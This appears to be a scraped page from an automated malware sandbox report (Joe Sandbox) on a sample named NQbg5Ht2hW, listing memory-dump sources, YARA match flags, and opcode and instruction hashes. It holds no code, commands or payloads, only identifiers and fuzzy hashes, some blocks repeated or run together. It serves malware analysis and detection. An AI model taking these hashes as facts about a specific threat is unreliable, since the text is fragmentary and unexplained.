• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: klm
• API String ID: 0-3800403225
• Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
• Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
• Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
• Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: klm
• API String ID: 0-3800403225
• Opcode ID: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction ID: 46d6564e0d082846842ecba632e150b6726f3a16c551f302456654f8a04f6e11
• Opcode Fuzzy Hash: 22a1d23ffb192b13ce7e4b67b3c031d181d26310d43a75b7846801cd596ae7fb
• Instruction Fuzzy Hash: 9E51D3B450D3608BD724DF24C45276BB7F2EFA6308F14996CE4D58B290E7398901CB1A

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: pF
• API String ID: 0-4112324664
• Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
• Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
• Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
• Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID: ?^A
• API String ID: 2994545307-4120214115
• Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
• Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
• Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: 6B
• API String ID: 0-4127139157
• Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
• Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
• Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
• Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: $%
• API String ID: 0-4214564638
• Opcode ID: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
• Instruction ID: 3d25c35802596f1a671f00645024d7ca33cd4a4e88a6bb9c447d8406b5381ce7
• Opcode Fuzzy Hash: 8b76b074fb6ee17701ca33ffcb44bdc905631d8a3bea69b2df4b17f098ff2867
• Instruction Fuzzy Hash: 4D4110B0D013198BDB10CF98DC917AEB7B1FF45310F098259E445AB795E7785941CB51

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: $%
• API String ID: 0-4214564638
• Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
• Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
• Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
• Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,+*)
• API String ID: 0-3529585375
• Opcode ID: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
• Instruction ID: 94fd5e0a12f8f09a4bca0e3888be68c4020d222805db8f35ffd75dd9846a14b5
• Opcode Fuzzy Hash: d0860ee87a3522d35f46aac91f37c79de7283bf131867904a39b4a27e1383bdc
• Instruction Fuzzy Hash: 5B31B639B412159FEB55CF58CC95BBEB3B2BB49300F289128D541A73D0CB75AD018794

Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: o`
                                                                                                                                                                                                                                                                        • API String ID: 0-3993896143
                                                                                                                                                                                                                                                                        • Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction ID: 4ad10b3155aa27b88642308c5da008726487fb32573d1c190adf5e99b11f99dc
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E511E570218380AFC310CF65CDC1B6EBFE29BC2204F65983DE18597291C679E949DB05
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                                                                                                                                                                                                        • Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                                        • Instruction ID: 46ead43bd988ad5b99a16a21c2ab1060e4939541d0428d2c05e05470f57672f5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42edef53a1db2b3de2c06a60c4f32876a63e42617b2c0b108f141745477d7c97
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C52E1715083458FCB14CF18C0806AABFE1FF89305F18897EE8996B391D778E949CB89
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                                                                                                                                                                                                                                                        • Instruction ID: 9052a562a464200cbbd0daa905c4084fc2c9e23ab64ab7037dfea0417d8b7d87
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbc0620a8ce2ba57e9d910984acef19c89c6c78f1b9d7e948e49654559093e9b
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F52E3B0A08B848FEB35DB28C4843E7BBF1BB51314F14892ED5E646AC2D27DA9C5C745
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                                        • Instruction ID: 42a8754500a030df467a19eb208a6b75f213c456a02a9d9f5179d7aa03d033db
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23751e459ccc9bb6a4f1f3a1e8208e8d277617bd75432395b0e424f8c0ad6651
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B952E3B0A08B949FE730CB24C4843A7BBE1AB91314F15483FD5D756BC2C27DB9958B0A
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • Instruction ID: f883ad1b7567bd0b89f3c073f6ae34fb197e1df63dab831c273c18db33e0ce69
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F12C232A0C7518BC729DF1CD8806EAB3F1EFC4315F19892DD9C697285D738A895CB86
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                                                                                                                                                                                                        • Instruction ID: 578974f19fc5cbc8fda695b8bc2c0033f2ceab120fcf922316c4e4b6ffb3a62a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1F19E35608741CFD724CF29C881AABBBE6AFD8300F18892DE5D587392E639D945CB52
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
                                                                                                                                                                                                                                                                        • Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction ID: 5d8f504d13bff7d69cff02e5329df9d5bf5ec9e4080cbf34290a07c63c52dc3e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D127C61608BC28ED325CA3C8849756BFD16BA6224F1CC79DD0F94B3D3C27AD546C7A2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction ID: 6af0af9fd07dbea0327a8a302486079f3e258e751aa577ffaaa1b30c4ee5c47c
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B129D61608BC28ED315CA3C8848756BFD16BA6228F1CC79DD0F94B3D3C27A9546C7A2
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                        • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                        • Instruction ID: 91ae254e8732ebf627d16462272c58b8b347736b6966e9014697d632d79873f2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BB1647AA05760DBD3248B99D880ABFB7D2FB95300F1D993DC9C2A7251CB399C048797
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                        • Opcode ID: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                        • Instruction ID: 23a67f9784c40b4fae1e0f2a92ee3ce02bb6a5ad8394e214f8bdb8e2c0ae01d9
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAB129B1704251ABFB18CE24C8556ABB7A2EF81304F19C53DE885CB382D73DED058761
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
• Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
• Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
• Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction ID: 7d2d6a85687870c0c9ca51156fc2f46ed212c0f6d0c543313ff0b17e2dae2fdb
• Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction Fuzzy Hash: ECF1C2F0914B40BFC3A5CF3AC946797BEECEB0A260F14491EF5AEC2241D73565458BA2
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
• Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction ID: e0078b9e96e2c1da739a03cdcf07114686bc40967900750d8dc01d1a5bf4b988
• Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction Fuzzy Hash: BE022761508BC18ED3268B3C8858A16BFD26B66224F0EC7DCD4E94F7E3C679D505C7A2
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
• Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
• Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
• Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
• Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
• Instruction ID: c076d9a4ee4bd5e7e08a38785b8082ad3dd9d45a3786a7c186c84ad49bf35078
• Opcode Fuzzy Hash: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
• Instruction Fuzzy Hash: B8B10736A183519BC724CF28C48056BB7E2FF99710F1A853CEA869B365E735AC41D781
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
• Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
• Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
